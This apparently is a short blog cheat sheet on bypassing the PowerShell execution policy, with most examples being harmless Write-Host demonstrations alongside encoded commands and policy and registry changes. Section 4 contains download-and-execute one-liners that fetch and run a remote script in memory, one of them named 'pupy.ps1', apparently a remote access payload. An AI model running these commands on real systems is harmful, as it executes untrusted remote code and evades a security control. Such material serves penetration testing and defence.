BYPASSING POWERSHELL EXECUTION POLICY

POLICY STATUS

PS C:> Get-ExecutionPolicy (Restricted/Bypass)

POLICY SCOPE 

Get-ExecutionPolicy -List | Format-Table -AutoSize

BYPASS POLICY 

1. COPY & PASTE

PS> write-host "string to execute"

CMD> Powershell -command "Write-Host 'My voice is my passport, verify me.'"
CMD> Powershell -c "Write-Host 'My voice is my passport, verify me.'"

2. ECHO SCRIPT

CMD> Echo Write-Host "powershell script"  | PowerShell.exe -noprofile -

3. From FILE pipe to standard in

Get-Content .runme.ps1 | PowerShell.exe -noprofile -
or
TYPE .runme.ps1 | PowerShell.exe -noprofile -

4. ONLINER

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"

Download Script from URL and Execute with Invoke Expression
This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn’t result in any configuration changes.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.43.221/pupy.ps1')"

5. ENCODED

$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand

AFTER ENCODING

powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA

6. INVOKE COMMAND

invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}
invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

7. INVOKE EXPRESSION

Get-Content .runme.ps1 | Invoke-Expression OR GC .runme.ps1 | iex

RESTRICT /BYPASS EXECUTION-POLICY

RUN WITHOUT CONF CHANGE
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1

FOR UNSIGNED SCRIPTS

PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1

SIGN IT  http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
THEN USE
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1

STATUS OF SCOPE

Set-ExecutionPolicy -Scope Process

FOR PROCESS (SESSION)
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

FOR USER PRSISTENT VIA REG KEY
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

MODIFYING REG KEY (PERSISTENT)
HKEY_CURRENT_USER\Software\MicrosoftPowerShell\1\ShellIds\Microsoft.PowerShell


REF : https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

No comments:

Post a Comment

Popular Posts